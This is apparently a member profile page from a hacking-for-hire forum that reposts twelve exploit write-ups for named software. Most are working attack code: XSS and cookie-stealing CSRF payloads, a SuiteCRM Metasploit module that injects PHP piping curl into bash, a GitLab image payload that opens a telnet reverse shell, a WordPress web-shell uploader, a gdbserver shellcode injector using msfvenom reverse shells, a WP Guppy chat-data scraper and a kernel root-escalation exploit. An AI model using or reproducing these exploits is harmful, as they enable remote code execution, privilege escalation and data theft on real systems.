Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS) # Date: 15/11/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.cmdbuild.org # Software Link: https://www.cmdbuild.org/en/download/latest-version # Version: CMDBuild 3.3.2 # Tested on: Linux Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections Proof of concepts : Stored Xss Example: 1-Login to you'r Dashboard As a low privilege user 2-Click On Basic archives and Employee 3- +Add card Employee 4- Enter your xss payload in parameters 5-On added employee click on "Open Relation Graph" POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1 ... Cmdbuild-Actionid: class.card.new.open Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353 Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K X-Requested-With: XMLHttpRequest Content-Length: 302 Connection: close {"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null} ------------------------------------------------------------------------ File upload Xss example: 1-Click on Basic archives 2-Click on Workplace - + Add card Workplace 3-Select "attachments" icon - +Add attachment + image 4-Upload your svg file with xss payload 5-Click on preview and Right click open in new tab Request: POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1 Cmdbuild-Actionid: class.card.attachments.open -----------------------------269319782833689825543405205260 Content-Disposition: form-data; name="file"; filename="kiwi.svg" Content-Type: image/svg+xml <?xml version="1.0" encoding="utf-8"?> <!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) --> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174" xml:space="preserve"> <ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/> <path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03 c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341 c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933 c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991 c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875 c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489 c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309 c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876 c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413 c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566 c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156 c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351 c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247 c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331 z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111 C434.693,207.929,439.613,203.01,445.731,203.01z"/> <script>alert(1)</script> </svg>
  2. HireHackking

    Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS) # Date: 19/10/2021 # Exploit Author: Vasu (tamilan_mkv) # Vendor Homepage: https://www.bludit.com # Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip # Version: bludit-3-13-1 # Tested on: kali linux # CVE : CVE-2021-35323 ### Steps to reproduce 1. Open login page http://localhost:800/admin/login; 2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password 3. Trigger the malicious javascript code
  3. HireHackking

    Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated) # Date: 21/04/2021 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip # Version: 6.7 # Tested on: Windows 8.1, Kali Linux, Burp Suite Steps to Reproduce: 1. At first login to your panel 2. then click the "Sliders" menu to "New Slider" 3. now intercept with the burp suite and save a new slider 4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value. 5. Now Generate a CSRF POC <!DOCTYPE html> <html> <body> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"> <input type="hidden" name="iSlider" value=""> <input type="hidden" name="aFile" filename=""> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"> <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>"> <input type="hidden" name="iPosition" value="1"> <input type="hidden" name="sOption" value="save"> <input type="submit" value="submit"> </form> </body> </html>
  4. HireHackking

    SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'SuiteCRM Log File Remote Code Execution', 'Description' => %q{ This module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included. }, 'License' => MSF_LICENSE, 'Author' => [ 'M. Cory Billington' # @_th3y ], 'References' => [ ['CVE', '2021-42840'], ['CVE', '2020-28328'], # First CVE ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit ], 'Platform' => %w[linux unix], 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], 'Targets' => [ [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true, 'DisclosureDate' => '2021-04-28', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), OptString.new('PASS', [true, 'Password for administrator', 'admin']), OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) ] ) end def check authenticate unless @authenticated return Exploit::CheckCode::Unknown unless @authenticated version_check_request = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Home', 'action' => 'About' } } ) return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request version_match = version_check_request.body[/ Version \s \d{1} # Major revision \. \d{1,2} # Minor revision \. \d{1,2} # Bug fix release /x] version = version_match.partition(' ').last if version.nil? || version.empty? about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About" return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.") end patched_version = Rex::Version.new('7.11.18') current_version = Rex::Version.new(version) return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version Exploit::CheckCode::Safe("SuiteCRM #{version}") end def authenticate print_status("Authenticating as #{datastore['USER']}") initial_req = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Users', 'action' => 'Login' } } ) return false unless initial_req && initial_req.code == 200 login = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_post' => { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'user_name' => datastore['USER'], 'username_password' => datastore['PASS'], 'Login' => 'Log In' } } ) return false unless login && login.code == 302 res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Administration', 'action' => 'index' } } ) auth_succeeded?(res) end def auth_succeeded?(res) return false unless res if res.code == 200 print_good("Authenticated as: #{datastore['USER']}") if res.body.include?('Unauthorized access to administration.') print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.") @is_admin = false else print_good("#{datastore['USER']} has administrative rights.") @is_admin = true end @authenticated = true return true else print_error("Failed to authenticate as: #{datastore['USER']}") return false end end def post_log_file(data) send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'keep_cookies' => true, 'headers' => { 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView" }, 'data' => data.to_s } ) end def modify_system_settings_file filename = rand_text_alphanumeric(8).to_s extension = '.pHp' @php_fname = filename + extension action = 'Modify system settings file' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"') data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"') data.add_part('info', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') res = post_log_file(data) check_logfile_request(res, action) end def poison_log_file action = 'Poison log file' if target.arch.first == 'cmd' command_injection = "<?php `curl #{@download_url} | bash`; ?>" else @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}" command_injection = %( <?php `curl #{@download_url} -o #{@meterpreter_fname}; /bin/chmod 700 #{@meterpreter_fname}; /bin/sh -c #{@meterpreter_fname};`; ?> ) end print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(command_injection, nil, nil, 'form-data; name="last_name"') res = post_log_file(data) check_logfile_request(res, action) end def restore action = 'Restore logging to default configuration' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"') data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"') data.add_part('fatal', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') post_log_file(data) data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"') res = post_log_file(data) print_error("Failed - #{action}") unless res && res.code == 301 print_good("Succeeded - #{action}") end def check_logfile_request(res, action) fail_with(Failure::Unknown, "#{action} - no reply") unless res unless res.code == 301 print_error("Failed - #{action}") fail_with(Failure::UnexpectedReply, "Failed - #{action}") end print_good("Succeeded - #{action}") end def execute_php print_status("Executing php code in log file: #{@php_fname}") res = send_request_cgi( { 'uri' => normalize_uri(target_uri, @php_fname), 'keep_cookies' => true } ) fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404 register_files_for_cleanup(@php_fname) register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? end def on_request_uri(cli, _request) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) print_good("#{peer} - Payload sent!") end def start_http_server start_service( { 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => resource_uri } } ) @download_url = get_uri end def exploit start_http_server authenticate unless @authenticated fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin modify_system_settings_file poison_log_file execute_php ensure restore if datastore['RESTORECONF'] end end
  5. HireHackking

    GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) # Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 # Date: 11/01/2021 # Exploit Author: Jacob Baines # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/gitlab-org/gitlab # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu) # CVE : CVE-2021-22205 # Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ # Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it. 1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg 2. Sending the payload. Any random endpoint will do. curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8) 2a. Sample Output from the reverse shell: $ nc -lnvp 1270 Listening on [0.0.0.0] (family 0, port 1270) Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836) whoami git id uid=998(git) gid=998(git) groups=998(git)
  6. HireHackking

    Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-19 # Vendor Homepage: http://www.ipuptime.net/ # Software Link : http://ipuptime.net/PinkieSetup.zip # Tested Version: 2.15 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Pinkie 2.15 TFTP Remote Buffer Overflow # Steps to reproduce: # 1. - Download and install Pinkie 2.15 # 2. - Start TFTP Server listening on port 69 # 3. - Run the Script from remote PC/IP # 4. - Crashed #!/usr/bin/env python3 import socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) read = ( #Request - read b'\x00\x01' #Static - opcode + b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin') b'\x00' #Delim - delim1 b'netascii' #String - transfer_mode b'\x00' #Delim - delim2 ) sock.sendto(read, ('192.168.1.207', 69)) sock.recv(65535) sock.close()
  7. HireHackking

    Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload # Google Dork: inurl: /wp-content/plugins/smart-product-review/ # Date: 16/11/2021 # Exploit Author: Keyvan Hardani # Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/ # Version: <= 1.0.4 # Tested on: Kali Linux import os.path from os import path import json import requests; import time import sys def banner(): animation = "|/-\\" for i in range(20): time.sleep(0.1) sys.stdout.write("\r" + animation[i % len(animation)]) sys.stdout.flush() #do something print("Smart Product Review 1.0.4 - Arbitrary File Upload") print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)") def usage(): print("Usage: python3 exploit.py [target url] [your shell]") print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("No script kiddies please!!" in raw): return False; else: return True; def main(): banner() if(len(sys.argv) != 3): usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'sprw_file_upload_action' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowedExtensions[0]" : "jpg", "allowedExtensions[1]" : "php4", "allowedExtensions[2]" : "phtml", "allowedExtensions[3]" : "png", "qqfile" : "files", "element_id" : "6837", "sizeLimit" : "12000000", "file_uploader_nonce" : "2b102311b7" } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if("ok" in response.text): print("Shell Uploaded!") print("Shell URL on your Review/Comment"); else: print("Shell Upload Failed") sys.exit(1) main();
  8. HireHackking

    Modbus Slave 7.3.1 - Buffer Overflow (DoS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-19 # Vendor Homepage: https://www.modbustools.com/ # Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe # Tested Version: 7.3.1 < 7.4.2 # Vulnerability Type: Buffer Overflow (DoS) Local # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow # Steps to reproduce: # 1. - Download and install Modbus Slave # 2. - Run the python script and it will create modbus.txt file. # 3. - Modbus Slave 7.3.1 < 7.4.2 # 4. - Connection -> Connect # 5. - Paste the characters of txt file Registration Key # 6. - press "ok" button # 7. - Crashed #!/usr/bin/python exploit = 'A' * 736 try: file = open("Modbus.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")
  9. HireHackking

    GNU gdbserver 9.2 - Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE) # Date: 2021-11-21 # Exploit Author: Roberto Gesteira Miñarro (7Rocky) # Vendor Homepage: https://www.gnu.org/software/gdb/ # Software Link: https://www.gnu.org/software/gdb/download/ # Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2 # Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries) #!/usr/bin/env python3 import binascii import socket import struct import sys help = f''' Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode> Example: - Victim's gdbserver -> 10.10.10.200:1337 - Attacker's listener -> 10.10.10.100:4444 1. Generate shellcode with msfvenom: $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin 2. Listen with Netcat: $ nc -nlvp 4444 3. Run the exploit: $ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin ''' def checksum(s: str) -> str: res = sum(map(ord, s)) % 256 return f'{res:2x}' def ack(sock): sock.send(b'+') def send(sock, s: str) -> str: sock.send(f'${s}#{checksum(s)}'.encode()) res = sock.recv(1024) ack(sock) return res.decode() def exploit(sock, payload: str): send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;') send(sock, '!') try: res = send(sock, 'vCont;s') data = res.split(';')[2] arch, pc = data.split(':') except Exception: print('[!] ERROR: Unexpected response. Try again later') exit(1) if arch == '10': print('[+] Found x64 arch') pc = binascii.unhexlify(pc[:pc.index('0*')]) pc += b'\0' * (8 - len(pc)) addr = hex(struct.unpack('<Q', pc)[0])[2:] addr = '0' * (16 - len(addr)) + addr elif arch == '08': print('[+] Found x86 arch') pc = binascii.unhexlify(pc) pc += b'\0' * (4 - len(pc)) addr = hex(struct.unpack('<I', pc)[0])[2:] addr = '0' * (8 - len(addr)) + addr hex_length = hex(len(payload))[2:] print('[+] Sending payload') send(sock, f'M{addr},{hex_length}:{payload}') send(sock, 'vCont;c') def main(): if len(sys.argv) < 3: print(help) exit(1) ip, port = sys.argv[1].split(':') file = sys.argv[2] try: with open(file, 'rb') as f: payload = f.read().hex() except FileNotFoundError: print(f'[!] ERROR: File {file} not found') exit(1) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((ip, int(port))) print('[+] Connected to target. Preparing exploit') exploit(sock, payload) print('[*] Pwned!! Check your listener') if __name__ == '__main__': main()
  10. HireHackking

    Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection # Date: 20/11/2021 # Exploit Author: Ilker Burak ADIYAMAN # Vendor Homepage: https://aimeos.org # Software Link: https://aimeos.org/laravel-ecommerce-package # Version: Aimeos 2021.10 LTS # Tested on: MacOSX *Description:* The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api. ==================== 1. SQLi ==================== https://127.0.0.1/default/jsonapi/review?sort=-ctime The "sort" parameter is vulnerable to SQL injection, reveals table and column names. step 1 : Copy json api GET request above. step 2 : Change sort parameter value to -- ---------------------------------------------------------------------- Parameter: sort (GET) Type: error based Title: GET parameter 'sort' appears to be injectable Payload: sort=--
  11. HireHackking

    Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure # Exploit Author: Keyvan Hardani # Date: 22/11/2021 # Vendor Homepage: https://wp-guppy.com/ # Version: up to 1.1 # Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2 # Usage ./exploit.sh -h #!/bin/bash Help() { # Display Help echo "Usage" echo echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure" echo echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)" echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" echo "-h Print this Help." echo } while getopts ":h" option; do case $option in h) # display Help Help exit;; esac done if [ $1 == 1 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool fi if [ $1 == 2 ] then curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool fi if [ $1 == 3 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool fi
  12. HireHackking

    Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2) # Date: 11/22/21 # Exploit Author: Ujas Dhami # Version: 4.19 - 5.2.1 # Platform: Linux # Tested on: # ~ Ubuntu 19.04 kernel 5.0.0-15-generic # ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 # ~ Kali Linux kernel 4.19.0-kali5-amd64 # CVE: CVE-2019-13272 // .... // Original discovery and exploit author: Jann Horn // https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 // Modified exploit code of: BColes // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // .... // ~ Uses the PolKit_Exec frontend. // ~ PolKit_Action is branched. // ~ Search is optimized. // ~ Trunks attain search priority upon execution. // .... // ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme // ujas@kali:~$ ./exploit_traceme // Welcome to your Arsenal! // accessing variables... // execution has reached EOP. // familiar trunks are been searched ... // trunk helper found: /usr/sbin/mate-power-backlight-helper // helper initiated: /usr/sbin/mate-power-backlight-helper // SUID process is being initiated (/usr/bin/pkexec) ... // midpid is being traced... // midpid attached. // root@kali:/home/ujas# // .... #include <ctype.h> #include <assert.h> #include <conio.h> #include <stdio.h> #include <sys/syscall.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <stddef.h> #include <sys/user.h> #include <linux/elf.h> #include <stdarg.h> #include <pwd.h> #include <sys/prctl.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #define _GNU_SOURCE #define DEBUG #ifdef DEBUG #define dprintf printf #endif #define max(a,b) ((a)>(b) ? (a) : (b)) #define eff(expr) ({ \ typeof(expr) __res = (expr); \ if (__res == -1) { \ dprintf("[-] Error: %s\n", #expr); \ return 0; \ } \ __res; \ }) struct stat st; const char *trunk[1024]; const char *trunks_rec[] = { "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", "/usr/sbin/mate-power-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", "/usr/lib/unity-settings-daemon/usd-backlight-helper", 